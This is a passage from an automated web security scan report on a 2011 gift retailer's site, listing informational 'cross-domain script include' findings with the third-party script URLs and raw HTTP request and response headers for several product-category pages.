http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1
https://cdn.mercent.com/js/tracker.js

Request

GET /halloween-home-decorations-PHALHOM HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:19:49 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:49 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:49 GMT
Connection: close
Content-Length: 201184

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
<script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.19. http://www.personalcreations.com/just-because-gifts-PJBEBSL previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/just-because-gifts-PJBEBSL

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1
https://cdn.mercent.com/js/tracker.js

Request

GET /just-because-gifts-PJBEBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:14 PM?0&9/3/2011 6:27:54 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:10 PM?0&9/3/2011 6:28:30 PM?0&9/3/2011 6:28:03 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:28:03 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:28:04 GMT
Connection: close
Content-Length: 413498

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
<script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.20. http://www.personalcreations.com/personalized-anniversary-gifts-PANNBSL previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-anniversary-gifts-PANNBSL

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1
https://cdn.mercent.com/js/tracker.js

Request

GET /personalized-anniversary-gifts-PANNBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:48 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:48 GMT
Connection: close
Content-Length: 381211

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
<script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.21. http://www.personalcreations.com/personalized-back-to-school-gifts-PBKDB2S previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-back-to-school-gifts-PBKDB2S

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1
https://cdn.mercent.com/js/tracker.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:19:49 PM?0&9/3/2011 6:19:56 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:56 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:56 GMT
Connection: close
Content-Length: 259186

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
